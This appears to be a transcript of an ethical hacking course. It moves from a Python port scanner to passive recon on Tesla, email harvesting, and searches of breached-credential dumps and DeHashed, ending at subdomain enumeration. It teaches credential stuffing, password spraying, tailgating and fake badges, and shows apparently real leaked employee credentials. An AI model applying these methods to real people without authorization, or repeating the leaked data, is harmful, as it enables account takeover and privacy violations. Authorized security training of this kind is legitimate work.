errors to be handled and that's where these exceptions come into play and these if statements at the beginning come into play as well so we can handle those errors and those exceptions and we can really start thinking logically on how an end user might fat finger something or break a program or do something even maliciously possibly so there are ways around this and we'll talk about it as well when we get into a bash script that i wrote later on in the course and we can kind of look at how that was written and how it strips out some arguments and prevent some human error but we'll get to that later so let's go ahead and actually save this now we've got our scanners scanner script and we're going to go ahead and run it so i'm going to run this and i'm going to run this against my router so my suggestion to you is to do the same or do it to a machine that you know is in your network and has a port open why am i choosing my router in this specific range now my router should have port 53 open because of dns and it should have port 80 open because i need to access the web interface on it so i'm going to go ahead and run this and i have a typo so i have something called soccer here i sure do if you caught that originally good job you knew i was gonna mess up let's try it one more time and there you go so it just ran through it really fast said port 53 is open port 80 is open and immediately you know it knew it knew so it did its job it went out there and it found port 53 and port 80 which is what i was expecting hopefully yours did the same now i could back this off to one through you know 65 535 and another thing we can do if you want to see the speed let's say 65 535 i am going to keyboard interrupt this but we can print out something along the lines of checking port and then we'll do something like this okay and then we say dot format and then port so when we save this and we run it let's take a look now so it's checking through all these ports it's going kind of fast but look it's it's finding ports but this isn't pretty right we wouldn't want this we only wanted to say when the ports open but it's taking some time um we're on port 20 000 of 65 000 so on top of you know just being being a little bit annoying it's uh it's really you know throwing our screen into 20 000 lines now so the only reason i would put a statement in here like this is if i was doing a couple numbers and i wanted to see like if we go back to 50 and to 80 we'll do 81. if we do this it's good way to see how fast your scanner is running if it's running it's a good way to have print statements in there if you might see any errors and you can see it ran through 80 pretty fast and found 53 and 80 open so i would delete this if you want to do a full port scan again you could do one through 65 535 go ahead and save that sorry if you heard my dog barking it's really windy tonight so we're gonna go ahead and do it one more time and now it should be a little prettier and then as the ports are open it'll print out and if you want to get fancier you could have a little thing at the bottom that says hey this took this long to scan here's how many ports are open et cetera so this is finding all the ports so i'm going to go ahead and ctrl c and you can see now exiting program our keyboard interrupt worked so everything is working really really well and that is it so that's it for the python series and hopefully this all made sense this all built upon it you know we could take this and the goal here again is not to be an expert in python the goal here is to get you interested in python to get you seeing that it's really not that bad and in about an hour and a half to two hours time we started with nothing and built out a nice script that all you know just built less than upon less until we got here so we're going to move on and actually get into the hacking you have successfully completed all of your foundational courses we've got the linux down we've got the networking down we've got the python down and now we're ready to get into the good stuff so i'm very excited to do the hacking this is our our strong suit this is our bread and butter and we're really going to knock out the park so i will catch you over in the next video when we start learning about hacking okay before we get hands on i have to give you a little bit of depth by a powerpoint but it's for good reason so we need to introduce the five stages of ethical hacking these are the five stages that you will go through on every assessment so before we do that let's first make a big note from here on we are moving into the ethical hacking portion of our course we are going to learn malicious things please only use the information learned in this course for ethical purposes do not attack your neighbors do not attack anybody that you do not have explicit permission to do so you can and will get into trouble for doing that so with that out of the way let's talk briefly about the five stages of ethical hacking so we start up at the top and we actually start with what is called reconnaissance the stage is also known as information gathering and there are two different types there's active and passive now passive is saying like going out to google and searching for somebody say you're giving a client and you want to look at their google you want to look at linkedin you might be looking for i don't know a picture of their badge or an employee's name or maybe an employee's twitter page that's all passive you're not actually going out to the company's website and doing anything active against it now active reconnaissance kind of falls into place with the second phase which is scanning in enumeration now that is active that is where we go out and we take tools such as nmap and nessus and nicto and you've never heard of any of those that's fine but we take those and we scan actively against a client now what we're looking for are open ports vulnerabilities different items and with what returns on these results when we do this scanning we also perform what is called enumeration enumeration is just looking at items and digging into them to see if we can find anything of value say that there is a web server running on port 80 we see port 80s open and it's running something like apache 1.2 which would be really really outdated we would go out to google and we would say google do you know if apache 1.2 has any exploits for it and we would do research that's the enumeration portion of it so once we do our information gathering we do our scanning enumeration then we move into the gaining access portion this is also known as exploitation we will run an exploit against the client or against the vulnerable service or whatever it may be to try to gain access into a machine or into a network into an environment etc once we have that access the process starts to repeat we do scanning and enumeration again and we also want to maintain that access right so if we were to get kicked out okay or a user shuts down their computer how do we maintain that access so when they turn their computer back on we still have access to it and then lastly there is the covering tracks you want to delete any logs that you may leave behind you want to delete any kind of malware that you upload which is more important as a pen tester any accounts that you create for any reason you want to delete those as well you really just want to clean up it's a good way of putting it covering tracks is the more hacker way of putting it but as a penetration tester you really just want to clean up so we're going to go heavily through steps one through three in this course we'll also cover four and five briefly but the process and methodology never changes regardless if you're doing network if you're doing web app or if you're doing a different type of assessment it's all similar in this five stages of hacking the tools might change the attack methods might change but the overall methodology is always the same so that's how we're also going to structure this course we're going to go in first and we're going to talk about information gathering and reconnaissance then we're going to move into scanning enumeration and then we'll start with exploitation and do that repeatedly till we get it inside of our heads and our it feels almost second nature right once we have all that done we'll do some practice boxes you know give it a go see how we do we'll move into the internal side of things with active directory we'll start working with our web applications and our wireless and we will touch on the maintaining access and covering tracks but you're going to see this methodology over and over and you might also get this question on an interview you know to describe the five stages so it's important to know these it's just something that every ethical hacker can rattle off pretty quickly so have this written down think about it keep your wheels spinning and let's go ahead and move on to our first section which is going to be information gathering slash reconnaissance learn some cool tools some google foo and just what kind of information we can actually gather on a potential client so in this section we are going to be talking about information gathering and all the information gathering we're going to do in this section is going to be passive so i'm calling this passive recon or passive reconnaissance i wanted to give a brief overview of what we're going to be covering and talk about some high level topics before we get into the weeds and really dive into our target so let's talk about the different types of passive recon so on the physical or social sides physical meaning actually going on site and maybe doing a physical engagement or the social engineering aspect of maybe doing a phishing assessment or even including it in a physical engagement or a wishing assessment just gathering this information from the physical social aspect is incredibly useful so we have location information so we might utilize something like satellite images or often we'll go on site and do drone reconnaissance where we fly a drone around and try to gain information and what we're really after with these images of this drone recon is we're trying to find out hey what is the building layout look like are there badge readers are there break areas does security exist do they have somebody posted out up front can you just walk right in the door what does their fencing look like are there areas where they're just leaving the doors propped open where do people go out and smoke in these break areas because those are a good place to just walk up to somebody light up a cigarette even if you don't smoke and just start a conversation and then tailgate right in with them into the building now the other aspect of this is the job information so we might be looking for employees online i might want to know somebody's name job title phone number who their manager is i try to get a good idea of what people look like so if i see them on site i have a good idea who they are i also look for pictures so i cannot tell you how many times a badge photo is posted on linkedin or somebody posted on twitter you could see all the memes out there about people posting their photos at work and it's bad it happens all the time i see it to this day so we're looking for badge photos i'm looking for desk photos computer photos i had a situation once where somebody took a picture of her watching a game at work she was watching a basketball game at work and the basketball game was on her computer and on her screen there it showed all the different tools that they utilized at work she had a work application open in this photo there was a desk in the background you can see different things and it just gives us information and that's really what we're after what kind of information can we gather now this course is not a course on physical or social so i kind of wanted to give a high level of what to expect we won't really be doing a whole lot of this in this course with this type of information gathering but these are the things that you should be looking for so if you are tasked with the physical assessment do go out there and look for satellite images try to get a good feel of the building layout and also try to get a feel for who the employees are who maybe the it manager is in case you're going to say you know i work for it they might ask you who your manager is you might need to know those names and of course look for pictures if you can find a good badge photo and what that looks like you can make a fake badge go on site and you'll be way more passable with that badge but sometimes they don't even look it could be drawn in crayon so from there let's go ahead and talk about what we will be doing a lot of which is the web and host so when you get a web or a host assessment the first thing you really should do is what is called target validation so we're going to be targeting something on bug crowds we're not really going to focus on this but what we're going to do in the real world is we would validate the target now there are situations where a client will give you an ip address or a website and they might they might fudge it right they might accidentally fat finger it put the wrong number put the wrong letter in the website and then guess what you're off attacking somebody else's website and there if you are a podcast listener there's a good dark net diaries episode on this if you don't listen darknet diaries go check it out there's a great episode with a guy named rob fuller aka mubix and he talks about getting the wrong ip address on an assessment and attacking the wrong people and actually gaining access to that machine which is a really really big big screw up on both parts right so you should always validate your targets on top of this when we're doing our web and our host on the website we're going to look for subdomains and we'll talk more about that as we get into it but we can do that with google we can do that with nmap sublister there's so many different tools that we can use and we'll cover some of the tools and how to do it get a little deep into that as well especially as we get into the website of things there's fingerprinting we need to know what's running on a website or what's running on a host what kind of services are out there are they running a web server what's that web server is it iis is it apache what version is it right are they running what ports are open on their machines oh they have ftp open what version of ftp is open so we need to fingerprint machines and kind of understand but on the passive side we're not touching any machine right so we're not going to be doing much scanning against a host we just have to utilize what kind of information might already be out there so if we go out to a website it's on the border of active but as long as we're not scanning it in my book it's still passive so we'll do we will cover some of the passive slash active side in this section and then when we get into scanning we'll get way more active with it lastly we're going to hit heavy especially in the beginning on data breaches data breaches are the most common way when we're doing an external assessment that we get into networks absolutely by far when we talk about data breaches we're talking about breached incidents from the past that have leaked data again these are like home depot equifax linkedin all kinds of breaches that are out there that have had credentials dumped and then those credentials become available to us eventually and we try to utilize those to gain access or at least utilize the usernames to gain access nowadays most the time there's not going to be an easy just scan find something vulnerable and exploit it on the external side of the house so we're looking for these data breaches and this information that we can gather and this is why information gathering and then enumeration and scanning most important by far the better scanning enumeration that you can do and the better information gathering you can do the better hacker you're going to be and the better you're going to be at your job so take these first two sections really serious so we're going to start in with identifying what our target's going to be for this part of the section and then we're going to go ahead and start talking about data breaches and why they're important and go deeper into that and then we'll go off some of these tools that you see here on this list and really dive into those so i will look forward to seeing you in the next video when we identify our target and get some information gathering started all right before we begin doing our reconnaissance we have to establish a client to attack so for this course we're going to be utilizing a client out of bug crowd if you've never heard of bug crowd bug crowd is a public bug bounty program what that means is there are programs on the website that will allow you to attack them and if you find a bug against the program you're able to submit it and potentially get money for it so you are able to hack these programs publicly as they are part of this program now the program we're going to be attacking is tesla so tesla is part of bug crowd now please do note please double check when you're watching this course as some time may have passed tesla might no longer be part of this bug bounty program so it's very critical to make sure that you are still within scope before you attack if for some reason tesla is no longer in scope just go ahead and pick a new client and do information gathering on them you don't have to pick tesla when we're doing this you can just do it to follow along with me but you're also welcome to pick any program you want so if you go to bugcrowd.com and we go to programs i will show you where tesla exists now you can see here that they have all different types of programs in here and if i were to scroll down and continuously i could find more and more and more there are hundreds of programs involved all kinds of names digital ocean octa really big names pinterest altassian anything that you can imagine probably has a bug program if it's a reputable okay any of the big names most likely have a bug program especially if they're reputable so here you can see what's based on reward what's based on charity and what's based on points only that's how the bug bounties are rewarded some of them are not all cash some of them are just for points and for kudos and the other ones are for charity i'm gonna go ahead and just search tesla and when i do that you can see here that tesla comes up now this is your first lesson into rules of engagement and we're going to talk about rules of engagement later but it's super important to read the program details that you see here and what we really need to do is we need to scroll through and make sure that we stay in scope when we're doing this so we have a wild card here so this means that any sub domain inside of tesla.com is fair game tesla.cn tesla motors etc what is more important is that we stay within this out of scope so we don't want to attack shop.eu shop.eu.teslamotors.com or energysupport.tesla.com it says you can report vulnerabilities to bug bounty for this one any domains from acquisitions messages maxwell so we have to stay within tesla and there's a few more sites we're not going to worry too much about that when we get into the web app portion of the course we're going to talk about way more detail on enumerating web applications and go into that so for now what we're going to do is we're just going to focus on information gathering what kind of information can we gather from this client so again i'm setting my target to tesla if you pick another tesla or another client just make sure you stay in scope of that client so from here we're going to move on to our first video and get our information gathering started welcome to the email osin section we're going to talk about discovering email addresses and this is something that i do on a weekly basis so i'm going to show you the most common tools that i use to actually look up email addresses and try to find people and what you can do to kind of verify email addresses so i'll show you some of my favorite tools and concepts and this is something that i do because not only for osint and doing it for investigative type work but think about sales if i'm trying to find a lead or i'm trying to find multiple leads within an organization i have to figure out where the emails are who the people i'm trying to email are so maybe i'll google them and say who is the cso or chief information security officer for this company and i might find that it's bob jones and we go look up bob jones and we say okay well how do i get bob jones contact information can i find it via google maybe maybe it's out there in the public but maybe we have to dig a little deeper maybe we have to kind of do some guesstimation and see if we can figure it out so that's what we're going to do today is is look at the email addresses formats and try to determine if we can find some emails so let's go ahead and move over to the kali linux machine that i've got and the first website is one of my favorites so hunter.io you just come to hunter.io you get like 50 or 100 free searches a month i don't remember what it is it's it's a fair amount uh you can come here and basically just type in a company name so like say i want to type in tcm security tcm sec and you can see tcm security here we get one result on the email address so we'll click it and see what happens here and looks like we have like an info at tcm tech dot com it tells us hey there's five sources that identify this so we see tcm-sect.com there's an about blogs this is where they're finding it okay a better example maybe a something that has more users like tesla tesla has 468 users if we come in here and we look well we can see that they have a pattern identified here so their pattern they're identifying is first initial last name at tesla.com and that's really what we want to see and then we can gather email addresses here if we want but say like we knew bob jones again going back to that example bob jones so maybe bob jones works at tesla maybe his email would be b jones at tesla.com so it's something to think about now we can sign up and get actual information here you should be able to sign up with a gmail account sometimes this does not work depending on the country that you are in so be cognizant you might have to use a different email address but i just tried signing up with a gmail account that i have on here and it worked just fine so i'm going to go ahead and try to log in i'm going to sign in with google with what's already here and just now i'm logged in so we can go back now and try searching tesla again you'll see that the results actually come back so we get information here now we get let me make this a little bit bigger we get information as to okay here's the vice president this is the vice president's email address uh project development manager maybe you want to talk to somebody in human resources so you can click here and go to human resources and then here are the different human resources um emails that are here so and then the sources that they found these email addresses so this isn't a particular person in hr but it's still human resources email addresses so this looks like it's probably for hong kong this is for berlin this is gigafactory so they have different email addresses based on where they are now if you looked up tcm security here you're really not going to find much on us because we don't have a ton of email addresses out there but i think that we can find more in other ways now so we only get so many uses here we'll just keep thinking about this as we move forward so 100. io great great resource they have plug-ins if you want them i think it's fantastic place to look phonebook.cz is the next resource i want to show you this one is fantastic let's start with tcm-sec.com and see so we're going to tcm.sec.com and we're going to search email addresses here so they do domains and urls as well which i think is awesome but let's just search for email address see if anything comes back no no results okay that's okay let's try tesla and see what comes back there okay a lot more so we get quite a few email addresses we can see elon musk all over the place we've got elon dash musk elon we've got emus over here and we get a ton of emails look at this so what's nice about this is we can sit here and try to identify what the possible email addresses are so again first initial last name looks like it's showing up quite a bit um outside of maybe like the elon musk's of the world we're getting a bunch of mostly first initial last names in here so i think that's pretty spot on with this uh the other thing that we can do is we could utilize this list say we're we're trying to do something called credential stuffing which we'll talk about in the next section actually when we talk about breach credentials but say we're trying to gather a bunch of usernames and test and see if we can log in with those usernames anywhere um or maybe password spraying not so much uh the credential stuffing but password spraying where we take all these usernames and we just throw it at a login form and say hey a summer 2020 exclamation point you know see if that logs into any of these accounts and you would be surprised it happens quite a bit so you know these are this is valuable information even if we don't know exactly maybe we're not just hunting for one email maybe we're hunting for an entire domain this is a great way to get free entire domains with a quick copy and paste capability like we have the tesla here we can export the csv from hunter.io but you only get so many results that you can export into a csv here you get a bunch there's no guarantee these are all valid but they're still it's still information information is what we want this is all we're trying to gather is as much information as possible so these are all potential email addresses for tesla.com i think it's a great great resource now we could also use something like voila no bear now this one you can get 50 more leads for free i'm not going to show you it's the same kind of deals 100.io they're showing you how to utilize it here basically you can just search for people and see to try to find their email addresses there is one i want to show you that i do use and i have quite a bit of success with and that is called clear bit and clear bit has to be used in chrome so i'm going to bring up this here clear bit has to be used in chrome so you can download the chrome extension for clear bit and all you have to do is go to google let me log in really quick and then i'm going to just select the free account we get so many searches 100 emails a month so basically you're going to search for clear bit connect and you would just say hey clear bit connect i'll put a link down below by the way but clear bit connect is awesome you'll see why here in a second once i authorize this okay we're going to come down here acknowledge probably give out our firstborn and then now we're going to say hey i want to find emails and here's all different kinds of things that we can sit here and search for you can see tcm securities in here these are some searches that i've done these aren't any clients of mine these are just searches that i've done in the past maybe looking for information or looking for possible leads or anything so if i come in here and i say hey i want to look for tcm security you could type that in i'm going to just click on tcm security and look what it discovered that the others didn't it discovered me okay and if i click on me look it says heat.tcm-sec.com where where did that come from and then look it has my linkedin right here as well that's amazing that's awesome and it says here you can email heat just click this button and then it's also got rizwan rizwan's on my sales team look it's got rizwan tcm.sec.com what does that tell you that tells you that we're using a first name basis for our email addresses it's awesome now let's come in here and maybe we want to look at tesla maybe let's try tesla one more time maybe we're looking for the cso of tesla tesla has a cso you could come in here and look like elon musk is right here obviously ceo but you could come in here and maybe go by roll and they have different roles in here so ceo let's see if we can find any sort of cso uh i don't see one but i do see information technology so maybe we can find somebody in the information technology department or iet department um and then here we go we've got quite a few it people here's a cio this could be somebody of interest that we might want to reach out to and we could just scroll through this list and find people so say we want to reach out to the cio just click on this we get first initial last name just like we thought we would we get this person's linkedin page we get their location website this is awesome awesome awesome so i typically will start with a google search if i'm trying to hunt something down i will start with a google search i will say who is in this role at this company if i'm looking for a specific person at a company then i will go to phonebook.cz or hunter.io try to identify the the formatting of the email and then try to find that person or guesstimate that once we get to that point i try not to burn through these clear bits unless i need to but clearbit is very good at identifying this once we get to that point we can take this email say like this this email or we'll even try a different email i'll show you a couple but we could take this and we can go try to verify this so there is a website called email hippo you can go to tools.vera and all you have to do is type in an email address here sometimes you can get false positives if they're good or bad uh here i typed in this email address a couple times and just got a bad result this is an email address that does not exist now let's try an email address that we saw info at tcm sec dot com see if it works result is okay so it says yeah this email address works so we're verifying that this is up so say that you get somebody and you see that they have a potential email address you can come here and try to verify it first and see if it works before you go fire off an email or don't you don't have to fire off an email you don't have to do anything or interact so this is the benefit like if you're from a sales perspective and you're doing ocean here the this is the benefit not having to email get waste your time get it rejected you can come in here and just validate if you're doing an investigation you don't want to interact with the person or company that you're investigating you want to come in here and just verify without any interaction this is the way to do it same thing with this website here emailchecker.net validate email dash checker dotnet validate say hey checking the email i put the same email address here you can see it says bad we could try again with info tcm sec.com and see if that works and it says okay so again this is doing a a great job there are possibilities of false positives there are so many searches that you can do per month on these i do believe they have apis which is nice if you want to automate this or script this out but i think this is this is fantastic this is great stuff now there are plenty of other ways to verify email addresses in the next section we'll talk about that even more as we talk about breach data because if somebody shows up in a data breach guess what that email address has been used in the past if you look at something like i have i been pwned which we'll talk about in the next section and they show up guess what that person's email address has existed so we're trying to verify if an email address exists who that address might belong to etc now this is more has been from a business perspective some of this hunting down of emails may be more difficult to do if you're trying to find a specific individual that's where breach data comes into play in a lot of this research and what i'm going to show you in the next section we'll try to hunt down individuals with maybe having loose pieces of information like a name or a username or something along those lines breach data can come in handy very very well so this is kind of scratching the surface now there's one last thing i want to show you one last little tip and trick do not underestimate forgot passwords do not underestimate them let's go to google for example right now i am logging in under an account that is please don't hack me sir please uh so it's please don't hack me sir plz i do believe i'm gonna go ahead and try hitting next on that okay so first of all it said hey welcome and what does this mean this means that we have a valid account here that's great this is validating that this gmail account exists here's something else we can use this to tie to potentially another account or help validate say we know that this email belongs to somebody that's harassing somebody else we don't know who this person is they're using this spoofed email but maybe we have a hunch or maybe we don't maybe we just want to try to get more data you can come to forgot password and it's going to say what's the last passage you remember using i don't know let's try another way you come down here and it says hey let me make this bigger google will send a verification code to h and it says look it shows you the rest of the the digits here and then at tc dot here that would give you a pretty good indication if you're tracking who your subject is that this email could tie to somebody else look this is heat that tcm tech dot com okay so this email belongs to me this is tying back to me now you have another point here so if you knew about this email address and now you have the link the connection to guarantee that this person this is evidence right here say you were doing something which we'll learn about again in the next section where you're looking through breach data you find a username that matches this email address and also matches this email address but people can reuse usernames there could be multiple people who use the same username so you need to verify or some link this would be a proof of a link between those a pretty strong proof if you ask me if you can say hey i identified two email addresses with the same username i did an account recovery came in here and saw that this had this same first character and first domain name i think that's a pretty strong correlation so things to think about wheels to be spinning try to identify email addresses any way possible we'll cover this more in depth in the next section and i'm really excited because password hunting is one of my favorite things so let's go ahead and move on to the next section when we talk about password ocean okay so i would like you to go out to github.com and then once you're there go ahead and just do a forward slash h maverick adams h m a v e r i c k adams and hit enter and you can see me and my snazzy photo here um but what we're after is i want to show you a tool that i wrote called breach parse and we're going to walk through what it does now go ahead and click on breach parse and you're going to see a bash script here and a little bit of a description so you do not need to download this let me preface with what we're doing here this magnet link you're going to need one a torrent some sort of utorrent or bittorrent and you'll need to download this and it's also something along the lines of 44 gigabytes extracted it's a huge file so you don't have to do this you can just watch and follow along you are more than welcome to install this on your machine i'm going to show you what it looks like so i'm going to go out to my applications and my files here and then i have put this into my opt folder so if you come into opt here and i've got breach parse if you come into this breach compilation folder which is what will download you're going to see that we have data here okay so this data has a bunch of different data it's got emails starting with zero one two three four all these different ones what's living inside of this is if we can display it is emails and passwords now you see these ones have weird symbols inside the emails but there's a bunch of emails and passwords in here like somebody at yahoo.com and their password is one two three four five six well these passwords are coming from credential dumps so we talked about it earlier about thinking about the you know equifax or the linkedin breach or home depot all these big breaches that happen credentials get dumped out and guess what they show up on the dark web and eventually they show up in these lists so we utilize these lists and we've got you click into this just hundreds of files here and again 44 gigabytes so what i did was i built a little tool that can search through this data and pull down names so we could take a quick look at the tool and what it does but basically what it does is you just put in the syntax you search for something like at tesla.com and then you specify you know tesla.txt and it's going to search through all of these files for at tesla.com if you're more interested in the code behind it you're more than welcome to read the code in here and see if some of the items that we've covered already with the batch scripting and the python scripting kind of ring a bell so what we're going to do is i'm going to come ahead and go into the terminal and make it a little bigger and then i'm just going to change into that folder breach parse and i'm going to run breach parse so reach parse here and what we're going to do is i'm just going to say at tesla.com and then tesla.txt and that's going to run so again you do not have to install this this is only for visual purposes i'm going to show you in the next video another way to do this so this is going to run through it's going to take a minute here and it's going to grab everybody's username and password that says tesla.com and the username and then it's going to have all the passwords and we're gonna be able to decipher things from this so i'm gonna let this run and as soon as it's done i'll come back and we'll talk about the results okay the results are back so this breaks it down into three files there is a it's cat tesla there is a master password and user so the master has the username and password and then the user's file has the users passwords has the passwords so i'm actually g edit the tesla master.txt and let's take a look at this so from here we don't have a big list surprisingly for a company the size of tesla so what happens is people utilize their work credentials their work emails and they log into websites and probably shouldn't be using their work emails for and we just use it to our advantage so we're after is we're after not only these usernames but we're after these passwords as well so we see these usernames and we see these passwords and i like to look for repeat offenders i like to look for the syntax as well remember we had first initial last name but we see first name dot last name here we see possibly you know just a single name there are different types of things in here so a nick at tesla.com as well so you know it's changed up i think nowadays it is first initial last name but maybe in the past they used first name dot last name then moved to an easier format or vice versa they started first initial last name they got too big then they had to do first name dot last name but again what we're after here is potential repeat offenders so look at this shark at tesla.com it got popped twice and the password is very very very similar so if i were to attack tesla.com through a login interface i might spray this username with this password and this password that's what we call credential stuffing because we already know the passwords and then i might make some modification of capitalized letters and non-capitalized letters with d-a-d-e because 907 and 8-1-4 appear to be consistent you know so i would alternate capitals in non-capitals here and lower case and just see maybe if something sticks so this is something that's interesting this user down here one two three four five one two three four five star probably not going to get in with that on a company like tesla but you never know but this is what we would do we would take the usernames and we would throw these passwords at it and that's called credential stuffing and then we would take these usernames and all the known usernames and we would spray passwords at them like fall 2019 like we talked about in the last video that's password spraying so this is a important and very very critical part of information gathering is gathering these usernames and these credentials right off the bat you want to identify those with your targets so this is kind of what it looks like this is what i do during every assessment and hopefully that makes sense and that works into it in the next video we're going to go ahead and just show another method and start thinking again about these credentials and how they can be utilized and then we'll do some other information gathering as we move on and learn some techniques and how we can get information on a client so i'll see you over in the next video okay let's talk about hunting breech credentials and let's get hands on now before we get started i know i stressed this in the beginning of the course i'm going to stress this again what i'm going to show you here could change now i released a course about a year ago which was on ethical hacking we talked about breach credentials and i utilized a website called we leak info we leak info was then eventually shut down and i got all kinds of emails saying hey this is shut down i don't know what to do there's more out there okay there's always more out there what i'm showing you is the methodology i could show you on a specific website which i'm going to do that website could go down tomorrow we never know but what you need to retain is the thought process and the methodology behind what's about to happen from there you could take that and utilize it elsewhere so if a website does go down you still have the same thoughts why you're doing it and why you're thinking about it so let's go ahead and move over to a website now so i want to take you to a website called d-hash now this is dash.com i do not expect you to be able to follow along at this point because this costs money okay it's five bucks for a week it's a hundred and fifty dollars for a year this is only used to take credit card they only now take bitcoin i do believe or some sort of cryptocurrency absolutely worth it in my opinion even get a week get a week see if you like it it's amazing there's gonna be tools i show you later on the course that we'll go through and we can do it locally like the one i just ran in the last video i ran breech parts right this is something that i put together and set up but and it's free but the database isn't maintained it's a slow search i don't get the results back as instantly and i can't tie it to as many data points as a website like this can i think this website is great now let's talk about what dhash can do now that i'm logged in we have the ability to search by let me make this a little bit bigger we have the ability to search by email username ip address name address phone number vin okay think about this say we know a email address okay we know an email address say it's bob bob at tesla.com we're not going to search this yet we take bob and we know bob it has an account and we're looking for him we search him bob shows up and we see bob shows up and we see maybe his name like bob jones or something like that shows up maybe something that he's been leaked in has his address or maybe there was an ip address tied to the client you're looking for or the person you're looking for this can all be identified what if bob has a username it's like bob bobrocks123 okay well we can search that username in here and see if that username has repeated itself at all which is great we could search by password so say bob's password was bobrox123 we could search that password and if it's unique enough then maybe we can actually do some advanced searching like if we go back to the example from last time like this last video we saw this 907dade814 we could put that into a search engine and see if that comes back to something else maybe that comes back to a user that is not at a tesla.com but maybe it's like bob at gmail.com and then guess what now we have bob's personal account or now we have bob tied to another email account especially if we search by name or something that we can tie them together we need to start being able to relate other accounts to each other we can do that with hashing we could do that with passwords there's a lot of things that we can do and we want to start tying this together as a real world example when i am looking at an organization and i'm doing research on on hashing or i'm doing research on breach credentials i'm trying to think okay first if my client if my client is tesla.com i might come in here and search at tesla.com and i might come see how many results are in here let's see what happens okay here's george tesla.com george has been in a shared data so there's no actual any detail details here besides a potential username a name email okay same thing with safety we'd have to scroll down and see if we can find something that okay here's adobe now adobe will have a there's actually a bob at tesla bob at tesla has a hash password here okay so now we can say well first of all we can go see if we can figure out what this hash is which we'll talk about in a second we can also go and say okay bob does bob exist anywhere else does this hash exist anywhere else on this website can we tie it to another account that maybe even if we don't crack the password then we can say okay this bob this ties to bob at gmail.com so like i would note this down and i would take this and copy it so from a real world example i would take all the data that i see on this website i would collect all of the passwords all the usernames everything so like tesla9 all of this i want to know what the passwords are i want to know who the people are i want to know all the data because if i could start finding patterns if i could start putting things together maybe i can even relate these back to their personal email accounts like we're talking about and then i can see password patterns there or other passwords and just start tying this down because my goal is to break into an organization if i'm doing a pen test my goal is to break into an organization so i'm going to take that data and if i can find other passwords related to a personal account i'm not going to go attempt to break into a personal account but i will take that data and i will put it together and maybe try to break into their work email account with those passwords that information this can tie to an investigation as well if you're hunting down an individual you're trying to tie them to other accounts this is incredibly useful if you can find their data in a breach database and have a password and that password's unique you can search it maybe find them somewhere else you find an ip address you find a name there are often ip addresses in here which we can tie to a location possibly and see here's that 907 8 or dade814 we could take this and maybe search it and see if it comes back anything who knows shark at tesla shark at tesla okay shark mail.ru look this is a new new email address we didn't know about this one before and look it does us a favor we searched d-a-d-e but here's the capitalize we didn't search for capitalize we're not searching specific okay and now we're getting more information look here's one for dropbox okay so it tells you where this is coming from and how you can tie it in if we can get any sort of name out of this um any sort of anything that would be amazing we can get a person's name or ip address and we can start tying them down but when you're doing different searches like this you need to start almost you know like in the investigations where they have like the the red yarn and it's going from one pin point to another you kind of have to zigzag that back and forth and really try to tie this down and you'll see that when we get into reporting how you might take one individual and really just see like a password tied to an account tied to this and this was the exact methodology that we took to get to that point because when you write a report you want to make sure that the investigative person or the say you're handing off to the police or whatever you want to make sure that the person that is doing what what you did or they can replicate what you did with ease and there's no no question about it so this is some of the the searching that we can do now if we come to d hash again we can come here and we can search by email username um name anything so you can put your name in here i mean if you want to search on here i think it's great you can come through here and just search for your name let's go back let's search tesla again i saw a hash in there the adobe hashes are kind of interesting they're not the easiest to pick up but let's see let's find this adobe hash so let's say we get a hash like this we could try to identify what this hash is we can try to crack this hash we can see if it's been cracked somewhere else um this hash as of right now we have no idea but we know bob at tesla.com we can maybe paste this in here first of all and see if it ties back to anything and there's 22 results back um you know i would probably be looking for somebody that has this password with the name of bob it's probably not going to be like a brett or a michael you know we might want to see if we can find another account somewhere else but these are all tying down to a hash from adobe so depending on how they were hashing this data we might not find anything else of interest but you can see all the things here all the different opportunities that are here for us to just do research and tie down information now we can go to a website called hashes.org and if we come here we have the capability to actually try to search for this hash so we could search hashes and see if we can find it so you can come in here and just paste it and again it doesn't do a great job in my opinion with the adobe hashes sometimes they crack but a lot of times it says it can't find them oops there we go let's try hitting a search here okay so it says not a valid hash now if you put this into google as a search you can see it didn't come back with anything either so we want to make sure that when we're searching this you know we we try all options there is an adobe database that if you do put in a hash and it does show up there's a github adobe database that will actually show up here so with that being said this is kind of what i want you to start thinking about when we're hunting down breach credentials how can i take a person or company that i'm looking into so if you have a company you can just go at company name.com or net or whatever it is search in here see how they show up if you have a person maybe a personal email account if you can find that person if you know their email account you come in here and say bob gmail.com maybe you don't know what their their email address is then maybe you come here to the main page you go okay i'm gonna look for a name i'm gonna look for bob jones and search for that and then you start taking this and trying to find the patterns if you know bob lives somewhere maybe you could find under dress for bob or maybe you know bob lives in like arizona you could search bob jones and see if bob shows up and then kind of take it from there and there is some search operators that you can utilize you can see bob jones is taking forever you can put this in quotations and search it again and kind of narrow down your results here so if we click on this you can see like here's a name of we got a lot of results but here's the name bob jones this is a very common name so um but you could see like if we're trying to look this down we can start searching and adding operators in here and trying to see if we can figure out to tie a username or something to them so again get your wheel spinning don't rely on just dehashed but just rely on thinking about this this is the thing you should think about again the hash could go down tomorrow but if you're thinking about it in in the way that the credentials and the information can be interwoven remember that red yarn again that's really what i want you to take away from this so we're going to do another video on this i'm going to show you some more i guess tools that are out there and some other things that you can do offer alternatives to this and then we'll wrap up this section so i'll catch you over in the next video the next several videos are going to talk about web information gathering so this is going to be important because a lot of the times we're going to be tasked with a web penetration test or we might encounter a website on an external or internal penetration test and being able to gather information and perform enumeration on those websites is super important so what i'm going to show you through out is how to gather some of the information passively that is out there and then we'll talk about active methods that actually involve going out to the website and gathering information that way as well so the first and most important thing especially when it comes to websites or bug bounty hunting etc is that we need to identify what sub-domains are out there and you saw earlier when we were looking at tesla it had a scope of something like asterix tesla.com this asterisk is a wild card this means that anything and everything is open to us in the scope except it was out of scope in the sub domain range now we can utilize tools to our advantage to discover these subdomains why are subdomains important well we might run into something that is like dev.tesla.com or we might run into a website that should have never been out there right like the dev or like uh test site.tesla.com for example or you might find login forms another reason that it's so important is because if you just look at tesla.com you're limiting yourself to one website where there could be potentially tons of websites on these sub domains so we really really need to hunt these and be certain that we're incorporating everything that we can when we're doing our assessments so one great tool that i want to point out is a tool called sublister now we need to install that so let's type in app install sublister like this okay and this will just take a second to get it all set up and we will utilize this tool to get these sub domains okay now that it's set up all we have to do is type in sublister hit tab for auto complete hit enter and it gives you the syntax we can do a dash dash h for help or dash h for help and all we really need here is a domain so we can say dash d for tesla dot com and it's going to start searching for tesla dot com and don't worry about this error if you get the air so it's looking through all these different search engines similar to what the harvester was doing but you're going to see that it's going to return quite a bit more so we see baidu yahoo google it's going to go through all these and 